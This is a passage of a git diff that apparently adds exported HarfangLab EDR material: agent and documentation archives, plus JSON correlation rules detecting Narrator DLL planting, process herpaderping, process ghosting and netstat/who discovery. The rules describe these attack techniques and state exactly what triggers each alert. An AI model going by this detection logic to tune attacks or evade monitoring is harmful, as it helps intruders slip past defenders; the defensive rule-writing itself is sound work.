diff --git a/README.md b/README.md
index 301c492..41298de 100644
--- a/README.md
+++ b/README.md
@@ -1,3 +1,9 @@ # harfanglab-research -Research about the EDR HarfangLab. \ No newline at end of file +Research about the EDR HarfangLab. + +- All edr agent +- One linux compiled x64 agent for reverse +- Sigma, Yara, Correlation_rules, driverBlocklist export +- Documentation export +- API Swagger
diff --git a/agents.zip b/agents.zip
new file mode 100644
index 0000000..2ab19e9
Binary files /dev/null and b/agents.zip differ
diff --git a/documentation.zip b/documentation.zip
new file mode 100644
index 0000000..42bad6f
Binary files /dev/null and b/documentation.zip differ
diff --git a/harfang_export/correlation_rule_export.json b/harfang_export/correlation_rule_export.json
new file mode 100644
index 0000000..8b0ee5c
--- /dev/null
+++ b/harfang_export/correlation_rule_export.json 
@@ -0,0 +1,834 @@ +{ + "id": "5d144118-7d20-43ae-99b2-4183693b60c6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "bd7155f6-c7cf-4461-8e31-1aa60bf0a7c9", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_dependencies": [], + "rule_is_depended_on": [], + "inner_sigma": [ + { + "id": "35076c6c-23b0-4be8-bcaa-609d1ffabbd1", + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "origin_stack_id": "b8e2fe4fc90e4d08", + "name": "Narrator Enabled at Startup", + "creation_date": "2025-11-05", + "modified_date": "2025-11-05", + "description": "Detects the narrator being enabled in registry.\n", + "hl_silent": false, + "hl_status": null, + "level": "low", + "raw_tags": [], + "rule_confidence": "weak", + "status": null, + "os": "windows", + "can_block": true + }, + { + "id": "eea1e78d-a331-437f-930b-3f21dadabd32", + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "origin_stack_id": "b8e2fe4fc90e4d08", + "name": "msttsloc DLL Created", + "creation_date": "2025-11-05", + "modified_date": "2025-11-05", + "description": "Detects `msttslocenus.dll` or `msttsloc_onecoreenus.dll` being written on disk.\n", + "hl_silent": false, + "hl_status": null, + "level": "medium", + "raw_tags": [], + "rule_confidence": "moderate", + "status": null, + "os": "windows", + "can_block": true 
+ } + ], + "inner_correlation": [], + "inner_rule_counts": { + "sigma": 2, + "correlation": 0 + }, + "rule_type": "correlation", + "is_valid": true, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:27.713402Z", + "creation_date": "2026-03-23T11:45:27.713405Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:27.713412Z", + "silent": false, + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://trustedsec.com/blog/hack-cessibility-when-dll-hijacks-meet-windows-helpers", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_narator_dll_planting.yml", + "content": "title: msttsloc DLL Created\nname: dll_create_rename\nid: eea1e78d-a331-437f-930b-3f21dadabd32\ndescription: |\n Detects `msttslocenus.dll` or `msttsloc_onecoreenus.dll` being written on disk.\nreferences:\n - https://trustedsec.com/blog/hack-cessibility-when-dll-hijacks-meet-windows-helpers\ndate: 2025/11/05\nmodified: 2025/11/05\nauthor: HarfangLab\ntags: []\nlogsource:\n product: windows\n category: filesystem_event\ndetection:\n selection_create:\n Path:\n - '?:\\windows\\system32\\speech\\engine\\tts\\msttslocenus.dll'\n - '?:\\windows\\system32\\speech_onecore\\engines\\tts\\msttsloc_onecoreenus.dll'\n Kind: 'create'\n\n selection_rename:\n TargetPath:\n - '?:\\windows\\system32\\speech\\engine\\tts\\msttslocenus.dll'\n - '?:\\windows\\system32\\speech_onecore\\engines\\tts\\msttsloc_onecoreenus.dll'\n Kind: 'rename'\n\n condition: 1 of selection_*\nlevel: medium\nconfidence: moderate\ngenerate: false\n---\ntitle: Narrator Enabled at Startup\nname: autostart_enabled\nid: 35076c6c-23b0-4be8-bcaa-609d1ffabbd1\ndescription: |\n Detects the narrator being enabled in registry.\nreferences:\n - https://trustedsec.com/blog/hack-cessibility-when-dll-hijacks-meet-windows-helpers\ndate: 2025/11/05\nmodified: 2025/11/05\nauthor: HarfangLab\ntags: 
[]\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|endswith: '\\Accessibility\\Configuration'\n Details|contains: 'Narrator'\n condition: selection\nlevel: low\nconfidence: weak\ngenerate: false\n---\ntitle: Persistence Installed via Windows Narrator\nid: 5d144118-7d20-43ae-99b2-4183693b60c6\ndescription: |\n Detects the installation of a persistence by abusing the Windows built-in Narrator accessibility feature by planting a non-default DLL and enabling it through registry configuration.\n Narrator automatically loads these DLLs at startup, allowing attackers to execute arbitrary code without user interaction.\n It is recommended to analyze the written library for malicious content and the behavior of processes to identify any suspicious activity.\nreferences:\n - https://trustedsec.com/blog/hack-cessibility-when-dll-hijacks-meet-windows-helpers\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2025/11/05\nmodified: 2026/01/23\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Persistence\ncorrelation:\n type: combination\n platform: windows\n rules:\n - dll_create_rename\n - autostart_enabled\n timespan: 30s\n condition: dll_create_rename and autostart_enabled\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "warnings": null, + "errors": null, + "rule_id": "5d144118-7d20-43ae-99b2-4183693b60c6", + "rule_name": "Persistence Installed via Windows Narrator", + "rule_description": "Detects the installation of a persistence by abusing the Windows built-in Narrator accessibility feature by planting a non-default DLL and enabling it through registry configuration.\nNarrator automatically loads these 
DLLs at startup, allowing attackers to execute arbitrary code without user interaction.\nIt is recommended to analyze the written library for malicious content and the behavior of processes to identify any suspicious activity.\n", + "rule_creation_date": "2025-11-05", + "rule_modified_date": "2026-01-23", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "synchronization_status": "e1942801-4a51-49fb-aa1e-bf854677f6c7", + "declared_in": null, + "source": "bd7155f6-c7cf-4461-8e31-1aa60bf0a7c9" +} +{ + "id": "c757bf7f-5276-4be4-b423-b66cc574df33", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "bd7155f6-c7cf-4461-8e31-1aa60bf0a7c9", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_dependencies": [], + "rule_is_depended_on": [], + "inner_sigma": [ + { + "id": "84fc14aa-6be1-4613-bba7-cd4a029e0ac1", + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "origin_stack_id": "b8e2fe4fc90e4d08", + "name": "Executable File Written to Disk", + "creation_date": "2026-03-17", + "modified_date": "2026-03-17", + "description": "Detects when an executable file is being written to disk.\nAdversaries may write executable files to disk as part of process herpaderping techniques.\n", + "hl_silent": false, + "hl_status": null, + "level": "low", + "raw_tags": 
[], + "rule_confidence": "weak", + "status": null, + "os": "windows", + "can_block": true + }, + { + "id": "fa11676c-07f7-42e3-a01e-3880978e7d05", + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "origin_stack_id": "b8e2fe4fc90e4d08", + "name": "Process Created via Legacy NT API", + "creation_date": "2026-03-17", + "modified_date": "2026-03-17", + "description": "Detects the creation of a process using legacy NT APIs such as ZwCreateThreadEx.\nAdversaries may use low-level NT APIs to create processes, potentially evading security controls and traditional process monitoring.\nThis technique is commonly used in process herpaderping attacks.\n", + "hl_silent": false, + "hl_status": null, + "level": "low", + "raw_tags": [], + "rule_confidence": "weak", + "status": null, + "os": "windows", + "can_block": true + } + ], + "inner_correlation": [], + "inner_rule_counts": { + "sigma": 2, + "correlation": 0 + }, + "rule_type": "correlation", + "is_valid": true, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:27.714319Z", + "creation_date": "2026-03-23T11:45:27.714321Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:27.714325Z", + "silent": false, + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://attack.mitre.org/techniques/T1055/", + "https://jxy-s.github.io/herpaderping/" + ], + "name": "t1055_process_herpaderping.yml", + "content": "title: Executable File Written to Disk\nname: written_executable\nid: 84fc14aa-6be1-4613-bba7-cd4a029e0ac1\ndescription: |\n Detects when an executable file is being written to disk.\n Adversaries may write executable files to disk as part of process herpaderping techniques.\nreferences:\n - https://jxy-s.github.io/herpaderping/\ndate: 2026/03/17\nmodified: 2026/03/17\nauthor: 
HarfangLab\ntags: []\nlogsource:\n product: windows\n category: filesystem_event\ndetection:\n selection:\n Kind: 'written_executable'\n\n condition: selection\nlevel: low\nconfidence: weak\ngenerate: false\n---\ntitle: Process Created via Legacy NT API\nname: zwcreatethreadex\nid: fa11676c-07f7-42e3-a01e-3880978e7d05\ndescription: |\n Detects the creation of a process using legacy NT APIs such as ZwCreateThreadEx.\n Adversaries may use low-level NT APIs to create processes, potentially evading security controls and traditional process monitoring.\n This technique is commonly used in process herpaderping attacks.\nreferences:\n - https://jxy-s.github.io/herpaderping/\ndate: 2026/03/17\nmodified: 2026/03/17\nauthor: HarfangLab\ntags: []\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n StackTrace|contains: 'ZwCreateThreadEx'\n\n condition: selection\nlevel: low\nconfidence: weak\ngenerate: false\n---\ntitle: Process Herpaderping Technique Detected\nid: c757bf7f-5276-4be4-b423-b66cc574df33\ndescription: |\n Detects the process herpaderping technique through correlation of executable file writing and legacy process creation events.\n Process herpaderping is an advanced evasion technique where adversaries write a malicious executable to disk, create a process using legacy NT APIs, and then potentially modify the file on disk after it's mapped into memory.\n The technique involves writing executable files to disk and creating processes with legacy NT APIs like ZwCreateThreadEx to evade traditional security controls.\n This allows the process to run with different content than what is actually stored on disk, making detection and analysis more difficult.\n This correlation rule identifies the sequence of operations characteristic of process herpaderping attacks.\n It is recommended to analyze both the process responsible for the herpaderping operation and the created process for malicious content and activities.\nreferences:\n - 
https://attack.mitre.org/techniques/T1055/\n - https://jxy-s.github.io/herpaderping/\ndate: 2026/03/17\nmodified: 2026/03/17\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - attack.t1055.012\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.DefenseEvasion\ncorrelation:\n type: combination\n platform: windows\n rules:\n - written_executable\n - zwcreatethreadex\n group-by:\n - processes\n processes:\n InjectorProcess:\n written_executable: initiator\n zwcreatethreadex: created.parent\n related-process: InjectorProcess\n timespan: 2s\n condition: zwcreatethreadex and written_executable\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "warnings": null, + "errors": null, + "rule_id": "c757bf7f-5276-4be4-b423-b66cc574df33", + "rule_name": "Process Herpaderping Technique Detected", + "rule_description": "Detects the process herpaderping technique through correlation of executable file writing and legacy process creation events.\nProcess herpaderping is an advanced evasion technique where adversaries write a malicious executable to disk, create a process using legacy NT APIs, and then potentially modify the file on disk after it's mapped into memory.\nThe technique involves writing executable files to disk and creating processes with legacy NT APIs like ZwCreateThreadEx to evade traditional security controls.\nThis allows the process to run with different content than what is actually stored on disk, making detection and analysis more difficult.\nThis correlation rule identifies the sequence of operations characteristic of process herpaderping attacks.\nIt is recommended to analyze both the process responsible for the herpaderping operation and the created process for malicious content and activities.\n", + "rule_creation_date": "2026-03-17", + "rule_modified_date": "2026-03-17", + "rule_status": 
null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1055", + "attack.t1055.012" + ], + "synchronization_status": "e1942801-4a51-49fb-aa1e-bf854677f6c7", + "declared_in": null, + "source": "bd7155f6-c7cf-4461-8e31-1aa60bf0a7c9" +} +{ + "id": "c885cbdc-4171-4e47-8a8e-ab75e8ef2393", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "bd7155f6-c7cf-4461-8e31-1aa60bf0a7c9", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_dependencies": [], + "rule_is_depended_on": [], + "inner_sigma": [ + { + "id": "63b8bd32-635b-4502-9608-767c742d73da", + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "origin_stack_id": "b8e2fe4fc90e4d08", + "name": "Process Created via Legacy NT API", + "creation_date": "2026-03-17", + "modified_date": "2026-03-17", + "description": "Detects the creation of a process using legacy NT APIs such as ZwCreateThreadEx.\nAdversaries may exploit the low level NtCreateProcessEx API, which allows them to supply a section object directly (instead of using the newer NtCreateUserProcess API). 
\nThis capability enables them to manipulate the temporary file that is mapped to that section.\nThis technique is commonly used in process ghosting attacks.\n", + "hl_silent": false, + "hl_status": null, + "level": "low", + "raw_tags": [], + "rule_confidence": "weak", + "status": null, + "os": "windows", + "can_block": true + }, + { + "id": "abd72622-1ac0-4b98-bf2d-99ae74a46dc9", + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "origin_stack_id": "b8e2fe4fc90e4d08", + "name": "File Created", + "creation_date": "2026-03-17", + "modified_date": "2026-03-17", + "description": "Detects the creation of a file that may be used in process ghosting attacks.\nAdversaries may create temporary executable files as part of process ghosting techniques.\n", + "hl_silent": false, + "hl_status": null, + "level": "low", + "raw_tags": [], + "rule_confidence": "weak", + "status": null, + "os": "windows", + "can_block": true + }, + { + "id": "f3dbc60e-b65f-41d6-bdf0-dbff684ef2ce", + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "origin_stack_id": "b8e2fe4fc90e4d08", + "name": "File Removed via NtSetInformationFile", + "creation_date": "2026-03-17", + "modified_date": "2026-03-17", + "description": "Detects the removal of a file through the use of the NtSetInformationFile API.\nAdversaries may remove files to cover their tracks after process ghosting operations.\n", + "hl_silent": false, + "hl_status": null, + "level": "low", + "raw_tags": [], + "rule_confidence": "weak", + "status": null, + "os": "windows", + "can_block": true + } + ], + "inner_correlation": [ + { + "id": "c805dbdc-4197-4e47-8a8e-ab73f7dc1795", + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false 
+ }, + "tenant": "b8e2fe4fc90e4d08", + "origin_stack_id": "b8e2fe4fc90e4d08", + "name": "File Created then Removed via NtSetInformationFile", + "creation_date": "2026-03-17", + "modified_date": "2026-03-17", + "description": "Detects the sequential creation and removal of a file using the NtSetInformationFile API.\nThis pattern is commonly observed in process ghosting techniques where adversaries create temporary files and then remove them to avoid detection.\n", + "hl_silent": false, + "hl_status": null, + "level": "low", + "raw_tags": [], + "rule_confidence": "weak", + "status": null + } + ], + "inner_rule_counts": { + "sigma": 3, + "correlation": 1 + }, + "rule_type": "correlation", + "is_valid": true, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:27.714282Z", + "creation_date": "2026-03-23T11:45:27.714290Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:27.714295Z", + "silent": false, + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.elastic.co/blog/process-ghosting-a-new-executable-image-tampering-attack", + "https://attack.mitre.org/techniques/T1055/" + ], + "name": "t1055_process_ghosting.yml", + "content": "title: File Created\nname: filecreation\nid: abd72622-1ac0-4b98-bf2d-99ae74a46dc9\ndescription: |\n Detects the creation of a file that may be used in process ghosting attacks.\n Adversaries may create temporary executable files as part of process ghosting techniques.\nreferences: []\ndate: 2026/03/17\nmodified: 2026/03/17\nauthor: HarfangLab\ntags: []\nlogsource:\n product: windows\n category: filesystem_event\ndetection:\n selection:\n Kind: 'create'\n\n condition: selection\nlevel: low\nconfidence: weak\ngenerate: false\n---\ntitle: File Removed via NtSetInformationFile\nname: fileremoval\nid: f3dbc60e-b65f-41d6-bdf0-dbff684ef2ce\ndescription: |\n Detects the removal of a file through the use of the 
NtSetInformationFile API.\n Adversaries may remove files to cover their tracks after process ghosting operations.\nreferences:\n - https://www.elastic.co/blog/process-ghosting-a-new-executable-image-tampering-attack\ndate: 2026/03/17\nmodified: 2026/03/17\nauthor: HarfangLab\ntags: []\nlogsource:\n product: windows\n category: filesystem_event\ndetection:\n selection:\n Kind: 'remove'\n StackTrace|contains: 'ZwSetInformationFile'\n\n condition: selection\nlevel: low\nconfidence: weak\ngenerate: false\n---\ntitle: File Created then Removed via NtSetInformationFile\nname: create_then_remove\nid: c805dbdc-4197-4e47-8a8e-ab73f7dc1795\ndescription: |\n Detects the sequential creation and removal of a file using the NtSetInformationFile API.\n This pattern is commonly observed in process ghosting techniques where adversaries create temporary files and then remove them to avoid detection.\nreferences:\n - https://www.elastic.co/blog/process-ghosting-a-new-executable-image-tampering-attack\ndate: 2026/03/17\nmodified: 2026/03/17\nauthor: HarfangLab\ntags: []\ncorrelation:\n type: combination\n platform: windows\n rules:\n - filecreation\n - fileremoval\n group-by:\n - processes\n - Path\n processes:\n InjectorProcess: initiator\n related-process: InjectorProcess\n timespan: 2s\n condition: filecreation then fileremoval\nlevel: low\nconfidence: weak\ngenerate: false\n---\ntitle: Process Created via Legacy NT API\nname: zwcreatethreadex\nid: 63b8bd32-635b-4502-9608-767c742d73da\ndescription: |\n Detects the creation of a process using legacy NT APIs such as ZwCreateThreadEx.\n Adversaries may exploit the low level NtCreateProcessEx API, which allows them to supply a section object directly (instead of using the newer NtCreateUserProcess API). 
\n This capability enables them to manipulate the temporary file that is mapped to that section.\n This technique is commonly used in process ghosting attacks.\nreferences:\n - https://www.elastic.co/blog/process-ghosting-a-new-executable-image-tampering-attack\n - https://attack.mitre.org/techniques/T1055/\ndate: 2026/03/17\nmodified: 2026/03/17\nauthor: HarfangLab\ntags: []\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n StackTrace|contains: 'ZwCreateThreadEx'\n\n condition: selection\nlevel: low\nconfidence: weak\ngenerate: false\n---\ntitle: Process Ghosting Technique Detected\nid: c885cbdc-4171-4e47-8a8e-ab75e8ef2393\ndescription: |\n Detects the process ghosting technique through correlation of file manipulation and legacy process creation events.\n Process ghosting is an advanced evasion technique where adversaries create a file, map it into memory, mark it for deletion, create a process from the mapped memory, and then remove the file.\n The technique involves creating and removing files using NT APIs and creating processes with legacy NT APIs like ZwCreateThreadEx.\n This allows the process to run without having a corresponding file on disk, making detection and analysis more difficult.\n This correlation rule identifies the sequence of operations characteristic of process ghosting attacks.\n It is recommended to analyze both the process responsible for the ghosting operation and the ghosted process for malicious content and activities.\nreferences:\n - https://www.elastic.co/blog/process-ghosting-a-new-executable-image-tampering-attack\n - https://attack.mitre.org/techniques/T1055/\ndate: 2026/03/17\nmodified: 2026/03/17\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - attack.t1055.012\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.DefenseEvasion\ncorrelation:\n type: combination\n platform: windows\n rules:\n - 
zwcreatethreadex\n - create_then_remove\n group-by:\n - processes\n processes:\n InjectorProcess:\n create_then_remove: InjectorProcess\n zwcreatethreadex: created.parent\n related-process: InjectorProcess\n timespan: 2s\n condition: create_then_remove then zwcreatethreadex\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "warnings": null, + "errors": null, + "rule_id": "c885cbdc-4171-4e47-8a8e-ab75e8ef2393", + "rule_name": "Process Ghosting Technique Detected", + "rule_description": "Detects the process ghosting technique through correlation of file manipulation and legacy process creation events.\nProcess ghosting is an advanced evasion technique where adversaries create a file, map it into memory, mark it for deletion, create a process from the mapped memory, and then remove the file.\nThe technique involves creating and removing files using NT APIs and creating processes with legacy NT APIs like ZwCreateThreadEx.\nThis allows the process to run without having a corresponding file on disk, making detection and analysis more difficult.\nThis correlation rule identifies the sequence of operations characteristic of process ghosting attacks.\nIt is recommended to analyze both the process responsible for the ghosting operation and the ghosted process for malicious content and activities.\n", + "rule_creation_date": "2026-03-17", + "rule_modified_date": "2026-03-17", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1055", + "attack.t1055.012" + ], + "synchronization_status": "e1942801-4a51-49fb-aa1e-bf854677f6c7", + "declared_in": null, + "source": "bd7155f6-c7cf-4461-8e31-1aa60bf0a7c9" +} +{ + "id": "e595008e-d87c-4a1b-a72c-3f9c72d68aca", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", 
+ "rule_effective_level": "medium", + "rule_effective_confidence": "moderate", + "alert_count": 0, + "source_id": "bd7155f6-c7cf-4461-8e31-1aa60bf0a7c9", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_dependencies": [], + "rule_is_depended_on": [], + "inner_sigma": [ + { + "id": "7072ca36-890c-4c57-977e-c4d4f6ee9fd5", + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "origin_stack_id": "b8e2fe4fc90e4d08", + "name": "Netstat Executed", + "creation_date": "2025-10-20", + "modified_date": "2026-01-21", + "description": "Detects the execution of the 'netstat' or 'ss' command on a Linux system, which is commonly used to display network connections, routing tables, and network interface statistics.\n", + "hl_silent": false, + "hl_status": null, + "level": "low", + "raw_tags": [], + "rule_confidence": "weak", + "status": null, + "os": "linux", + "can_block": true + }, + { + "id": "ba4e984f-a924-436e-ac4d-0022fa899737", + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "origin_stack_id": "b8e2fe4fc90e4d08", + "name": "Who Executed", + "creation_date": "2025-10-20", + "modified_date": "2026-01-21", + "description": "Detects the execution of the 'who -a' command on a Linux system, which provides detailed information about all logged-in users, their login times, and system status.\n", + "hl_silent": false, + "hl_status": null, + "level": "low", + "raw_tags": [], + "rule_confidence": "weak", + "status": null, + "os": "linux", + "can_block": true + } + ], + "inner_correlation": 
[], + "inner_rule_counts": { + "sigma": 2, + "correlation": 0 + }, + "rule_type": "correlation", + "is_valid": true, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:27.713529Z", + "creation_date": "2026-03-23T11:45:27.713532Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:27.713540Z", + "silent": false, + "rule_level": "medium", + "rule_confidence": "moderate", + "rule_confidence_override": null, + "references": [ + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md#atomic-test-1---system-network-connections-discovery", + "https://attack.mitre.org/techniques/T1049/", + "https://attack.mitre.org/software/S0104/" + ], + "name": "t1049_system_network_connections_discovered_linux.yml", + "content": "title: Netstat Executed\nname: cmd_netstat\nid: 7072ca36-890c-4c57-977e-c4d4f6ee9fd5\ndescription: |\n Detects the execution of the 'netstat' or 'ss' command on a Linux system, which is commonly used to display network connections, routing tables, and network interface statistics.\nreferences:\n - https://man7.org/linux/man-pages/man8/netstat.8.html\n - https://man7.org/linux/man-pages/man8/ss.8.html\n - https://attack.mitre.org/software/S0104/\ndate: 2025/10/20\nmodified: 2026/01/21\nauthor: HarfangLab\ntags: []\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n CommandLine:\n - 'netstat'\n - 'ss'\n\n exclusion_bladelogic:\n ProcessGrandparentImage:\n - '/opt/bmc/bladelogic/RSCD/bin/rscd_full'\n - '/opt/bladelogic/*/NSH/bin/rscd_full'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\ngenerate: false\n---\ntitle: Who Executed\nname: cmd_who\nid: ba4e984f-a924-436e-ac4d-0022fa899737\ndescription: |\n Detects the execution of the 'who -a' command on a Linux system, which provides detailed information about all logged-in users, their login times, and system status.\nreferences:\n - 
https://man7.org/linux/man-pages/man1/who.1.html\ndate: 2025/10/20\nmodified: 2026/01/21\nauthor: HarfangLab\ntags: []\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n CommandLine: 'who -a'\n\n condition: selection\nlevel: low\nconfidence: weak\ngenerate: false\n---\ntitle: System Network Connections Discovered (Linux)\nid: e595008e-d87c-4a1b-a72c-3f9c72d68aca\ndescription: |\n Detects the execution of commands to retrieve information about network connections.\n Attackers may use it during the discovery phase to display information about the system.\n It is recommended to investigate the process performing this action to determine its legitimacy.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md#atomic-test-1---system-network-connections-discovery\n - https://attack.mitre.org/techniques/T1049/\n - https://attack.mitre.org/software/S0104/\ndate: 2025/10/20\nmodified: 2026/01/21\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1049\n - attack.t1033\n - attack.s0104\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Discovery\ncorrelation:\n type: combination\n platform: linux\n rules:\n - cmd_netstat\n - cmd_who\n group-by:\n - processes\n processes:\n MyProcess: created.parent\n related-process: MyProcess\n timespan: 2s\n condition: cmd_netstat and cmd_who\nlevel: medium\nconfidence: moderate\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "warnings": null, + "errors": null, + "rule_id": "e595008e-d87c-4a1b-a72c-3f9c72d68aca", + "rule_name": "System Network Connections Discovered (Linux)", + "rule_description": "Detects the execution of commands to retrieve information about network connections.\nAttackers may use it during the discovery phase to display information about the system.\nIt is recommended to investigate the process performing this action to determine its legitimacy.\n", + 
"rule_creation_date": "2025-10-20", + "rule_modified_date": "2026-01-21", + "rule_status": null, + "rule_tactic_tags": [ + "attack.discovery" + ], + "rule_technique_tags": [ + "attack.t1033", + "attack.t1049" + ], + "synchronization_status": "e1942801-4a51-49fb-aa1e-bf854677f6c7", + "declared_in": null, + "source": "bd7155f6-c7cf-4461-8e31-1aa60bf0a7c9" +} +{ + "id": "eed7ad50-c4a6-476b-b3b8-c8570d32b537", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "moderate", + "alert_count": 0, + "source_id": "bd7155f6-c7cf-4461-8e31-1aa60bf0a7c9", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_dependencies": [], + "rule_is_depended_on": [], + "inner_sigma": [ + { + "id": "d885a69a-230a-40fb-ac5a-0c215fe11e32", + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "origin_stack_id": "b8e2fe4fc90e4d08", + "name": "Net Use Executed", + "creation_date": "2025-10-17", + "modified_date": "2026-01-21", + "description": "Detects the execution of the 'net use' command on a Windows system, which is used to display shared network resources.\n", + "hl_silent": false, + "hl_status": null, + "level": "low", + "raw_tags": [], + "rule_confidence": "weak", + "status": null, + "os": "windows", + "can_block": true + }, + { + "id": "007eb20f-51e0-4032-a8b3-c02ad63835d2", + 